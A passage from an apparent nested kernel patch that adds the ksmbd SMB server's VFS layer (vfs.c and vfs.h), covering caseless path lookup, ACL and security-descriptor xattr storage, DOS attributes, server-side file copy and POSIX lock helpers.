++	err = iterate_dir(fp->filp, &readdir_data.ctx);
++	if (readdir_data.dirent_count > 2)
++		err = -ENOTEMPTY;
++	else
++		err = 0;
++	return err;
++}
++
++static bool __caseless_lookup(struct dir_context *ctx, const char *name,
++			     int namlen, loff_t offset, u64 ino,
++			     unsigned int d_type)
++{
++	struct ksmbd_readdir_data *buf;
++	int cmp = -EINVAL;
++
++	buf = container_of(ctx, struct ksmbd_readdir_data, ctx);
++
++	if (buf->used != namlen)
++		return true;
++	if (IS_ENABLED(CONFIG_UNICODE) && buf->um) {
++		const struct qstr q_buf = {.name = buf->private,
++					   .len = buf->used};
++		const struct qstr q_name = {.name = name,
++					    .len = namlen};
++
++		cmp = utf8_strncasecmp(buf->um, &q_buf, &q_name);
++	}
++	if (cmp < 0)
++		cmp = strncasecmp((char *)buf->private, name, namlen);
++	if (!cmp) {
++		memcpy((char *)buf->private, name, namlen);
++		buf->dirent_count = 1;
++		return false;
++	}
++	return true;
++}
++
++/**
++ * ksmbd_vfs_lookup_in_dir() - lookup a file in a directory
++ * @dir:	path info
++ * @name:	filename to lookup
++ * @namelen:	filename length
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int ksmbd_vfs_lookup_in_dir(const struct path *dir, char *name,
++				   size_t namelen, struct unicode_map *um)
++{
++	int ret;
++	struct file *dfilp;
++	int flags = O_RDONLY | O_LARGEFILE;
++	struct ksmbd_readdir_data readdir_data = {
++		.ctx.actor	= __caseless_lookup,
++		.private	= name,
++		.used		= namelen,
++		.dirent_count	= 0,
++		.um		= um,
++	};
++
++	dfilp = dentry_open(dir, flags, current_cred());
++	if (IS_ERR(dfilp))
++		return PTR_ERR(dfilp);
++
++	ret = iterate_dir(dfilp, &readdir_data.ctx);
++	if (readdir_data.dirent_count > 0)
++		ret = 0;
++	fput(dfilp);
++	return ret;
++}
++
++/**
++ * ksmbd_vfs_kern_path() - lookup a file and get path info
++ * @name:	file path that is relative to share
++ * @flags:	lookup flags
++ * @path:	if lookup succeed, return path info
++ * @caseless:	caseless filename lookup
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
++			unsigned int flags, struct path *path, bool caseless)
++{
++	struct ksmbd_share_config *share_conf = work->tcon->share_conf;
++	int err;
++
++	flags |= LOOKUP_BENEATH;
++	err = vfs_path_lookup(share_conf->vfs_path.dentry,
++			      share_conf->vfs_path.mnt,
++			      name,
++			      flags,
++			      path);
++	if (!err)
++		return 0;
++
++	if (caseless) {
++		char *filepath;
++		struct path parent;
++		size_t path_len, remain_len;
++
++		filepath = kstrdup(name, GFP_KERNEL);
++		if (!filepath)
++			return -ENOMEM;
++
++		path_len = strlen(filepath);
++		remain_len = path_len;
++
++		parent = share_conf->vfs_path;
++		path_get(&parent);
++
++		while (d_can_lookup(parent.dentry)) {
++			char *filename = filepath + path_len - remain_len;
++			char *next = strchrnul(filename, '/');
++			size_t filename_len = next - filename;
++			bool is_last = !next[0];
++
++			if (filename_len == 0)
++				break;
++
++			err = ksmbd_vfs_lookup_in_dir(&parent, filename,
++						      filename_len,
++						      work->conn->um);
++			path_put(&parent);
++			if (err)
++				goto out;
++
++			next[0] = '\0';
++
++			err = vfs_path_lookup(share_conf->vfs_path.dentry,
++					      share_conf->vfs_path.mnt,
++					      filepath,
++					      flags,
++					      &parent);
++			if (err)
++				goto out;
++			else if (is_last) {
++				*path = parent;
++				goto out;
++			}
++
++			next[0] = '/';
++			remain_len -= filename_len + 1;
++		}
++
++		path_put(&parent);
++		err = -EINVAL;
++out:
++		kfree(filepath);
++	}
++	return err;
++}
++
++struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
++					  const char *name,
++					  unsigned int flags,
++					  struct path *path)
++{
++	char *abs_name;
++	struct dentry *dent;
++
++	abs_name = convert_to_unix_name(work->tcon->share_conf, name);
++	if (!abs_name)
++		return ERR_PTR(-ENOMEM);
++
++	dent = kern_path_create(AT_FDCWD, abs_name, path, flags);
++	kfree(abs_name);
++	return dent;
++}
++
++int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
++				struct dentry *dentry)
++{
++	char *name, *xattr_list = NULL;
++	ssize_t xattr_list_len;
++	int err = 0;
++
++	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	if (xattr_list_len < 0) {
++		goto out;
++	} else if (!xattr_list_len) {
++		ksmbd_debug(SMB, "empty xattr in the file\n");
++		goto out;
++	}
++
++	for (name = xattr_list; name - xattr_list < xattr_list_len;
++	     name += strlen(name) + 1) {
++		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
++
++		if (!strncmp(name, XATTR_NAME_POSIX_ACL_ACCESS,
++			     sizeof(XATTR_NAME_POSIX_ACL_ACCESS) - 1) ||
++		    !strncmp(name, XATTR_NAME_POSIX_ACL_DEFAULT,
++			     sizeof(XATTR_NAME_POSIX_ACL_DEFAULT) - 1)) {
++			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
++			if (err)
++				ksmbd_debug(SMB,
++					    "remove acl xattr failed : %s\n", name);
++		}
++	}
++out:
++	kvfree(xattr_list);
++	return err;
++}
++
++int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
++			       struct dentry *dentry)
++{
++	char *name, *xattr_list = NULL;
++	ssize_t xattr_list_len;
++	int err = 0;
++
++	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	if (xattr_list_len < 0) {
++		goto out;
++	} else if (!xattr_list_len) {
++		ksmbd_debug(SMB, "empty xattr in the file\n");
++		goto out;
++	}
++
++	for (name = xattr_list; name - xattr_list < xattr_list_len;
++			name += strlen(name) + 1) {
++		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
++
++		if (!strncmp(name, XATTR_NAME_SD, XATTR_NAME_SD_LEN)) {
++			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
++			if (err)
++				ksmbd_debug(SMB, "remove xattr failed : %s\n", name);
++		}
++	}
++out:
++	kvfree(xattr_list);
++	return err;
++}
++
++static struct xattr_smb_acl *ksmbd_vfs_make_xattr_posix_acl(struct user_namespace *user_ns,
++							    struct inode *inode,
++							    int acl_type)
++{
++	struct xattr_smb_acl *smb_acl = NULL;
++	struct posix_acl *posix_acls;
++	struct posix_acl_entry *pa_entry;
++	struct xattr_acl_entry *xa_entry;
++	int i;
++
++	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
++		return NULL;
++
++	posix_acls = get_acl(inode, acl_type);
++	if (!posix_acls)
++		return NULL;
++
++	smb_acl = kzalloc(sizeof(struct xattr_smb_acl) +
++			  sizeof(struct xattr_acl_entry) * posix_acls->a_count,
++			  GFP_KERNEL);
++	if (!smb_acl)
++		goto out;
++
++	smb_acl->count = posix_acls->a_count;
++	pa_entry = posix_acls->a_entries;
++	xa_entry = smb_acl->entries;
++	for (i = 0; i < posix_acls->a_count; i++, pa_entry++, xa_entry++) {
++		switch (pa_entry->e_tag) {
++		case ACL_USER:
++			xa_entry->type = SMB_ACL_USER;
++			xa_entry->uid = posix_acl_uid_translate(user_ns, pa_entry);
++			break;
++		case ACL_USER_OBJ:
++			xa_entry->type = SMB_ACL_USER_OBJ;
++			break;
++		case ACL_GROUP:
++			xa_entry->type = SMB_ACL_GROUP;
++			xa_entry->gid = posix_acl_gid_translate(user_ns, pa_entry);
++			break;
++		case ACL_GROUP_OBJ:
++			xa_entry->type = SMB_ACL_GROUP_OBJ;
++			break;
++		case ACL_OTHER:
++			xa_entry->type = SMB_ACL_OTHER;
++			break;
++		case ACL_MASK:
++			xa_entry->type = SMB_ACL_MASK;
++			break;
++		default:
++			pr_err("unknown type : 0x%x\n", pa_entry->e_tag);
++			goto out;
++		}
++
++		if (pa_entry->e_perm & ACL_READ)
++			xa_entry->perm |= SMB_ACL_READ;
++		if (pa_entry->e_perm & ACL_WRITE)
++			xa_entry->perm |= SMB_ACL_WRITE;
++		if (pa_entry->e_perm & ACL_EXECUTE)
++			xa_entry->perm |= SMB_ACL_EXECUTE;
++	}
++out:
++	posix_acl_release(posix_acls);
++	return smb_acl;
++}
++
++int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
++			   struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   struct smb_ntsd *pntsd, int len)
++{
++	int rc;
++	struct ndr sd_ndr = {0}, acl_ndr = {0};
++	struct xattr_ntacl acl = {0};
++	struct xattr_smb_acl *smb_acl, *def_smb_acl = NULL;
++	struct inode *inode = d_inode(dentry);
++
++	acl.version = 4;
++	acl.hash_type = XATTR_SD_HASH_TYPE_SHA256;
++	acl.current_time = ksmbd_UnixTimeToNT(current_time(inode));
++
++	memcpy(acl.desc, "posix_acl", 9);
++	acl.desc_len = 10;
++
++	pntsd->osidoffset =
++		cpu_to_le32(le32_to_cpu(pntsd->osidoffset) + NDR_NTSD_OFFSETOF);
++	pntsd->gsidoffset =
++		cpu_to_le32(le32_to_cpu(pntsd->gsidoffset) + NDR_NTSD_OFFSETOF);
++	pntsd->dacloffset =
++		cpu_to_le32(le32_to_cpu(pntsd->dacloffset) + NDR_NTSD_OFFSETOF);
++
++	acl.sd_buf = (char *)pntsd;
++	acl.sd_size = len;
++
++	rc = ksmbd_gen_sd_hash(conn, acl.sd_buf, acl.sd_size, acl.hash);
++	if (rc) {
++		pr_err("failed to generate hash for ndr acl\n");
++		return rc;
++	}
++
++	smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
++						 ACL_TYPE_ACCESS);
++	if (S_ISDIR(inode->i_mode))
++		def_smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
++							     ACL_TYPE_DEFAULT);
++
++	rc = ndr_encode_posix_acl(&acl_ndr, user_ns, inode,
++				  smb_acl, def_smb_acl);
++	if (rc) {
++		pr_err("failed to encode ndr to posix acl\n");
++		goto out;
++	}
++
++	rc = ksmbd_gen_sd_hash(conn, acl_ndr.data, acl_ndr.offset,
++			       acl.posix_acl_hash);
++	if (rc) {
++		pr_err("failed to generate hash for ndr acl\n");
++		goto out;
++	}
++
++	rc = ndr_encode_v4_ntacl(&sd_ndr, &acl);
++	if (rc) {
++		pr_err("failed to encode ndr to posix acl\n");
++		goto out;
++	}
++
++	rc = ksmbd_vfs_setxattr(user_ns, dentry,
++				XATTR_NAME_SD, sd_ndr.data,
++				sd_ndr.offset, 0);
++	if (rc < 0)
++		pr_err("Failed to store XATTR ntacl :%d\n", rc);
++
++	kfree(sd_ndr.data);
++out:
++	kfree(acl_ndr.data);
++	kfree(smb_acl);
++	kfree(def_smb_acl);
++	return rc;
++}
++
++int ksmbd_vfs_get_sd_xattr(struct ksmbd_conn *conn,
++			   struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   struct smb_ntsd **pntsd)
++{
++	int rc;
++	struct ndr n;
++	struct inode *inode = d_inode(dentry);
++	struct ndr acl_ndr = {0};
++	struct xattr_ntacl acl;
++	struct xattr_smb_acl *smb_acl = NULL, *def_smb_acl = NULL;
++	__u8 cmp_hash[XATTR_SD_HASH_SIZE] = {0};
++
++	rc = ksmbd_vfs_getxattr(user_ns, dentry, XATTR_NAME_SD, &n.data);
++	if (rc <= 0)
++		return rc;
++
++	n.length = rc;
++	rc = ndr_decode_v4_ntacl(&n, &acl);
++	if (rc)
++		goto free_n_data;
++
++	smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
++						 ACL_TYPE_ACCESS);
++	if (S_ISDIR(inode->i_mode))
++		def_smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
++							     ACL_TYPE_DEFAULT);
++
++	rc = ndr_encode_posix_acl(&acl_ndr, user_ns, inode, smb_acl,
++				  def_smb_acl);
++	if (rc) {
++		pr_err("failed to encode ndr to posix acl\n");
++		goto out_free;
++	}
++
++	rc = ksmbd_gen_sd_hash(conn, acl_ndr.data, acl_ndr.offset, cmp_hash);
++	if (rc) {
++		pr_err("failed to generate hash for ndr acl\n");
++		goto out_free;
++	}
++
++	if (memcmp(cmp_hash, acl.posix_acl_hash, XATTR_SD_HASH_SIZE)) {
++		pr_err("hash value diff\n");
++		rc = -EINVAL;
++		goto out_free;
++	}
++
++	*pntsd = acl.sd_buf;
++	if (acl.sd_size < sizeof(struct smb_ntsd)) {
++		pr_err("sd size is invalid\n");
++		goto out_free;
++	}
++
++	(*pntsd)->osidoffset = cpu_to_le32(le32_to_cpu((*pntsd)->osidoffset) -
++					   NDR_NTSD_OFFSETOF);
++	(*pntsd)->gsidoffset = cpu_to_le32(le32_to_cpu((*pntsd)->gsidoffset) -
++					   NDR_NTSD_OFFSETOF);
++	(*pntsd)->dacloffset = cpu_to_le32(le32_to_cpu((*pntsd)->dacloffset) -
++					   NDR_NTSD_OFFSETOF);
++
++	rc = acl.sd_size;
++out_free:
++	kfree(acl_ndr.data);
++	kfree(smb_acl);
++	kfree(def_smb_acl);
++	if (rc < 0) {
++		kfree(acl.sd_buf);
++		*pntsd = NULL;
++	}
++
++free_n_data:
++	kfree(n.data);
++	return rc;
++}
++
++int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
++				   struct dentry *dentry,
++				   struct xattr_dos_attrib *da)
++{
++	struct ndr n;
++	int err;
++
++	err = ndr_encode_dos_attr(&n, da);
++	if (err)
++		return err;
++
++	err = ksmbd_vfs_setxattr(user_ns, dentry, XATTR_NAME_DOS_ATTRIBUTE,
++				 (void *)n.data, n.offset, 0);
++	if (err)
++		ksmbd_debug(SMB, "failed to store dos attribute in xattr\n");
++	kfree(n.data);
++
++	return err;
++}
++
++int ksmbd_vfs_get_dos_attrib_xattr(struct user_namespace *user_ns,
++				   struct dentry *dentry,
++				   struct xattr_dos_attrib *da)
++{
++	struct ndr n;
++	int err;
++
++	err = ksmbd_vfs_getxattr(user_ns, dentry, XATTR_NAME_DOS_ATTRIBUTE,
++				 (char **)&n.data);
++	if (err > 0) {
++		n.length = err;
++		if (ndr_decode_dos_attr(&n, da))
++			err = -EINVAL;
++		kfree(n.data);
++	} else {
++		ksmbd_debug(SMB, "failed to load dos attribute in xattr\n");
++	}
++
++	return err;
++}
++
++/**
++ * ksmbd_vfs_init_kstat() - convert unix stat information to smb stat format
++ * @p:          destination buffer
++ * @ksmbd_kstat:      ksmbd kstat wrapper
++ */
++void *ksmbd_vfs_init_kstat(char **p, struct ksmbd_kstat *ksmbd_kstat)
++{
++	struct file_directory_info *info = (struct file_directory_info *)(*p);
++	struct kstat *kstat = ksmbd_kstat->kstat;
++	u64 time;
++
++	info->FileIndex = 0;
++	info->CreationTime = cpu_to_le64(ksmbd_kstat->create_time);
++	time = ksmbd_UnixTimeToNT(kstat->atime);
++	info->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(kstat->mtime);
++	info->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(kstat->ctime);
++	info->ChangeTime = cpu_to_le64(time);
++
++	if (ksmbd_kstat->file_attributes & FILE_ATTRIBUTE_DIRECTORY_LE) {
++		info->EndOfFile = 0;
++		info->AllocationSize = 0;
++	} else {
++		info->EndOfFile = cpu_to_le64(kstat->size);
++		info->AllocationSize = cpu_to_le64(kstat->blocks << 9);
++	}
++	info->ExtFileAttributes = ksmbd_kstat->file_attributes;
++
++	return info;
++}
++
++int ksmbd_vfs_fill_dentry_attrs(struct ksmbd_work *work,
++				struct user_namespace *user_ns,
++				struct dentry *dentry,
++				struct ksmbd_kstat *ksmbd_kstat)
++{
++	u64 time;
++	int rc;
++
++	generic_fillattr(user_ns, d_inode(dentry), ksmbd_kstat->kstat);
++
++	time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->ctime);
++	ksmbd_kstat->create_time = time;
++
++	/*
++	 * set default value for the case that store dos attributes is not yes
++	 * or that acl is disable in server's filesystem and the config is yes.
++	 */
++	if (S_ISDIR(ksmbd_kstat->kstat->mode))
++		ksmbd_kstat->file_attributes = FILE_ATTRIBUTE_DIRECTORY_LE;
++	else
++		ksmbd_kstat->file_attributes = FILE_ATTRIBUTE_ARCHIVE_LE;
++
++	if (test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_STORE_DOS_ATTRS)) {
++		struct xattr_dos_attrib da;
++
++		rc = ksmbd_vfs_get_dos_attrib_xattr(user_ns, dentry, &da);
++		if (rc > 0) {
++			ksmbd_kstat->file_attributes = cpu_to_le32(da.attr);
++			ksmbd_kstat->create_time = da.create_time;
++		} else {
++			ksmbd_debug(VFS, "fail to load dos attribute.\n");
++		}
++	}
++
++	return 0;
++}
++
++ssize_t ksmbd_vfs_casexattr_len(struct user_namespace *user_ns,
++				struct dentry *dentry, char *attr_name,
++				int attr_name_len)
++{
++	char *name, *xattr_list = NULL;
++	ssize_t value_len = -ENOENT, xattr_list_len;
++
++	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	if (xattr_list_len <= 0)
++		goto out;
++
++	for (name = xattr_list; name - xattr_list < xattr_list_len;
++			name += strlen(name) + 1) {
++		ksmbd_debug(VFS, "%s, len %zd\n", name, strlen(name));
++		if (strncasecmp(attr_name, name, attr_name_len))
++			continue;
++
++		value_len = ksmbd_vfs_xattr_len(user_ns, dentry, name);
++		break;
++	}
++
++out:
++	kvfree(xattr_list);
++	return value_len;
++}
++
++int ksmbd_vfs_xattr_stream_name(char *stream_name, char **xattr_stream_name,
++				size_t *xattr_stream_name_size, int s_type)
++{
++	char *type, *buf;
++
++	if (s_type == DIR_STREAM)
++		type = ":$INDEX_ALLOCATION";
++	else
++		type = ":$DATA";
++
++	buf = kasprintf(GFP_KERNEL, "%s%s%s",
++			XATTR_NAME_STREAM, stream_name,	type);
++	if (!buf)
++		return -ENOMEM;
++
++	*xattr_stream_name = buf;
++	*xattr_stream_name_size = strlen(buf) + 1;
++
++	return 0;
++}
++
++int ksmbd_vfs_copy_file_ranges(struct ksmbd_work *work,
++			       struct ksmbd_file *src_fp,
++			       struct ksmbd_file *dst_fp,
++			       struct srv_copychunk *chunks,
++			       unsigned int chunk_count,
++			       unsigned int *chunk_count_written,
++			       unsigned int *chunk_size_written,
++			       loff_t *total_size_written)
++{
++	unsigned int i;
++	loff_t src_off, dst_off, src_file_size;
++	size_t len;
++	int ret;
++
++	*chunk_count_written = 0;
++	*chunk_size_written = 0;
++	*total_size_written = 0;
++
++	if (!(src_fp->daccess & (FILE_READ_DATA_LE | FILE_EXECUTE_LE))) {
++		pr_err("no right to read(%pD)\n", src_fp->filp);
++		return -EACCES;
++	}
++	if (!(dst_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE))) {
++		pr_err("no right to write(%pD)\n", dst_fp->filp);
++		return -EACCES;
++	}
++
++	if (ksmbd_stream_fd(src_fp) || ksmbd_stream_fd(dst_fp))
++		return -EBADF;
++
++	smb_break_all_levII_oplock(work, dst_fp, 1);
++
++	if (!work->tcon->posix_extensions) {
++		for (i = 0; i < chunk_count; i++) {
++			src_off = le64_to_cpu(chunks[i].SourceOffset);
++			dst_off = le64_to_cpu(chunks[i].TargetOffset);
++			len = le32_to_cpu(chunks[i].Length);
++
++			if (check_lock_range(src_fp->filp, src_off,
++					     src_off + len - 1, READ))
++				return -EAGAIN;
++			if (check_lock_range(dst_fp->filp, dst_off,
++					     dst_off + len - 1, WRITE))
++				return -EAGAIN;
++		}
++	}
++
++	src_file_size = i_size_read(file_inode(src_fp->filp));
++
++	for (i = 0; i < chunk_count; i++) {
++		src_off = le64_to_cpu(chunks[i].SourceOffset);
++		dst_off = le64_to_cpu(chunks[i].TargetOffset);
++		len = le32_to_cpu(chunks[i].Length);
++
++		if (src_off + len > src_file_size)
++			return -E2BIG;
++
++		ret = vfs_copy_file_range(src_fp->filp, src_off,
++					  dst_fp->filp, dst_off, len, 0);
++		if (ret == -EOPNOTSUPP || ret == -EXDEV)
++			ret = vfs_copy_file_range(src_fp->filp, src_off,
++						  dst_fp->filp, dst_off, len,
++						  COPY_FILE_SPLICE);
++		if (ret < 0)
++			return ret;
++
++		*chunk_count_written += 1;
++		*total_size_written += ret;
++	}
++	return 0;
++}
++
++void ksmbd_vfs_posix_lock_wait(struct file_lock *flock)
++{
++	wait_event(flock->fl_wait, !flock->fl_blocker);
++}
++
++int ksmbd_vfs_posix_lock_wait_timeout(struct file_lock *flock, long timeout)
++{
++	return wait_event_interruptible_timeout(flock->fl_wait,
++						!flock->fl_blocker,
++						timeout);
++}
++
++void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock)
++{
++	locks_delete_block(flock);
++}
++
++int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
++				 struct inode *inode)
++{
++	struct posix_acl_state acl_state;
++	struct posix_acl *acls;
++	int rc;
++
++	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
++		return -EOPNOTSUPP;
++
++	ksmbd_debug(SMB, "Set posix acls\n");
++	rc = init_acl_state(&acl_state, 1);
++	if (rc)
++		return rc;
++
++	/* Set default owner group */
++	acl_state.owner.allow = (inode->i_mode & 0700) >> 6;
++	acl_state.group.allow = (inode->i_mode & 0070) >> 3;
++	acl_state.other.allow = inode->i_mode & 0007;
++	acl_state.users->aces[acl_state.users->n].uid = inode->i_uid;
++	acl_state.users->aces[acl_state.users->n++].perms.allow =
++		acl_state.owner.allow;
++	acl_state.groups->aces[acl_state.groups->n].gid = inode->i_gid;
++	acl_state.groups->aces[acl_state.groups->n++].perms.allow =
++		acl_state.group.allow;
++	acl_state.mask.allow = 0x07;
++
++	acls = posix_acl_alloc(6, GFP_KERNEL);
++	if (!acls) {
++		free_acl_state(&acl_state);
++		return -ENOMEM;
++	}
++	posix_state_to_acl(&acl_state, acls->a_entries);
++	rc = set_posix_acl(user_ns, inode, ACL_TYPE_ACCESS, acls);
++	if (rc < 0)
++		ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
++			    rc);
++	else if (S_ISDIR(inode->i_mode)) {
++		posix_state_to_acl(&acl_state, acls->a_entries);
++		rc = set_posix_acl(user_ns, inode, ACL_TYPE_DEFAULT,
++				   acls);
++		if (rc < 0)
++			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
++				    rc);
++	}
++	free_acl_state(&acl_state);
++	posix_acl_release(acls);
++	return rc;
++}
++
++int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
++				struct inode *inode, struct inode *parent_inode)
++{
++	struct posix_acl *acls;
++	struct posix_acl_entry *pace;
++	int rc, i;
++
++	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
++		return -EOPNOTSUPP;
++
++	acls = get_acl(parent_inode, ACL_TYPE_DEFAULT);
++	if (!acls)
++		return -ENOENT;
++	pace = acls->a_entries;
++
++	for (i = 0; i < acls->a_count; i++, pace++) {
++		if (pace->e_tag == ACL_MASK) {
++			pace->e_perm = 0x07;
++			break;
++		}
++	}
++
++	rc = set_posix_acl(user_ns, inode, ACL_TYPE_ACCESS, acls);
++	if (rc < 0)
++		ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
++			    rc);
++	if (S_ISDIR(inode->i_mode)) {
++		rc = set_posix_acl(user_ns, inode, ACL_TYPE_DEFAULT,
++				   acls);
++		if (rc < 0)
++			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
++				    rc);
++	}
++	posix_acl_release(acls);
++	return rc;
++}
+diff --git a/fs/smb/server/vfs.h b/fs/smb/server/vfs.h
+new file mode 100644
+index 0000000000000..593059ca85112
+--- /dev/null
++++ b/fs/smb/server/vfs.h
+@@ -0,0 +1,167 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_VFS_H__
++#define __KSMBD_VFS_H__
++
++#include <linux/file.h>
++#include <linux/fs.h>
++#include <linux/namei.h>
++#include <uapi/linux/xattr.h>
++#include <linux/posix_acl.h>
++#include <linux/unicode.h>
++
++#include "smbacl.h"
++#include "xattr.h"
++
++/*
++ * Enumeration for stream type.
++ */
++enum {
++	DATA_STREAM	= 1,	/* type $DATA */
++	DIR_STREAM		/* type $INDEX_ALLOCATION */
++};
++
++/* CreateOptions */
++#define CREATE_TREE_CONNECTION			cpu_to_le32(0x00000080)
++#define FILE_RESERVE_OPFILTER_LE		cpu_to_le32(0x00100000)
++
++#define CREATE_OPTION_READONLY			0x10000000
++/* system. NB not sent over wire */
++#define CREATE_OPTION_SPECIAL			0x20000000
++
++struct ksmbd_work;
++struct ksmbd_file;
++struct ksmbd_conn;
++
++struct ksmbd_dir_info {
++	const char	*name;
++	char		*wptr;
++	char		*rptr;
++	int		name_len;
++	int		out_buf_len;
++	int		num_entry;
++	int		data_count;
++	int		last_entry_offset;
++	bool		hide_dot_file;
++	int		flags;
++	int		last_entry_off_align;
++};
++
++struct ksmbd_readdir_data {
++	struct dir_context	ctx;
++	union {
++		void		*private;
++		char		*dirent;
++	};
++
++	unsigned int		used;
++	unsigned int		dirent_count;
++	unsigned int		file_attr;
++	struct unicode_map	*um;
++};
++
++/* ksmbd kstat wrapper to get valid create time when reading dir entry */
++struct ksmbd_kstat {
++	struct kstat		*kstat;
++	unsigned long long	create_time;
++	__le32			file_attributes;
++};
++
++int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
++			  struct dentry *child);
++int ksmbd_vfs_may_delete(struct user_namespace *user_ns, struct dentry *dentry);
++int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
++				   struct dentry *dentry, __le32 *daccess);
++int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode);
++int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode);
++int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp,
++		   size_t count, loff_t *pos);
++int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
++		    char *buf, size_t count, loff_t *pos, bool sync,
++		    ssize_t *written);
++int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id);
++int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name);
++int ksmbd_vfs_link(struct ksmbd_work *work,
++		   const char *oldname, const char *newname);
++int ksmbd_vfs_getattr(const struct path *path, struct kstat *stat);
++int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
++			char *newname);
++int ksmbd_vfs_truncate(struct ksmbd_work *work,
++		       struct ksmbd_file *fp, loff_t size);
++struct srv_copychunk;
++int ksmbd_vfs_copy_file_ranges(struct ksmbd_work *work,
++			       struct ksmbd_file *src_fp,
++			       struct ksmbd_file *dst_fp,
++			       struct srv_copychunk *chunks,
++			       unsigned int chunk_count,
++			       unsigned int *chunk_count_written,
++			       unsigned int *chunk_size_written,
++			       loff_t  *total_size_written);
++ssize_t ksmbd_vfs_listxattr(struct dentry *dentry, char **list);
++ssize_t ksmbd_vfs_getxattr(struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   char *xattr_name,
++			   char **xattr_buf);
++ssize_t ksmbd_vfs_casexattr_len(struct user_namespace *user_ns,
++				struct dentry *dentry, char *attr_name,
++				int attr_name_len);
++int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
++		       struct dentry *dentry, const char *attr_name,
++		       void *attr_value, size_t attr_size, int flags);
++int ksmbd_vfs_xattr_stream_name(char *stream_name, char **xattr_stream_name,
++				size_t *xattr_stream_name_size, int s_type);
++int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
++			   struct dentry *dentry, char *attr_name);
++int ksmbd_vfs_kern_path(struct ksmbd_work *work,
++			char *name, unsigned int flags, struct path *path,
++			bool caseless);
++struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
++					  const char *name,
++					  unsigned int flags,
++					  struct path *path);
++int ksmbd_vfs_empty_dir(struct ksmbd_file *fp);
++void ksmbd_vfs_set_fadvise(struct file *filp, __le32 option);
++int ksmbd_vfs_zero_data(struct ksmbd_work *work, struct ksmbd_file *fp,
++			loff_t off, loff_t len);
++struct file_allocated_range_buffer;
++int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
++			 struct file_allocated_range_buffer *ranges,
++			 unsigned int in_count, unsigned int *out_count);
++int ksmbd_vfs_unlink(struct user_namespace *user_ns,
++		     struct dentry *dir, struct dentry *dentry);
++void *ksmbd_vfs_init_kstat(char **p, struct ksmbd_kstat *ksmbd_kstat);
++int ksmbd_vfs_fill_dentry_attrs(struct ksmbd_work *work,
++				struct user_namespace *user_ns,
++				struct dentry *dentry,
++				struct ksmbd_kstat *ksmbd_kstat);
++void ksmbd_vfs_posix_lock_wait(struct file_lock *flock);
++int ksmbd_vfs_posix_lock_wait_timeout(struct file_lock *flock, long timeout);
++void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock);
++int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
++				struct dentry *dentry);
++int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
++			       struct dentry *dentry);
++int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
++			   struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   struct smb_ntsd *pntsd, int len);
++int ksmbd_vfs_get_sd_xattr(struct ksmbd_conn *conn,
++			   struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   struct smb_ntsd **pntsd);
++int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
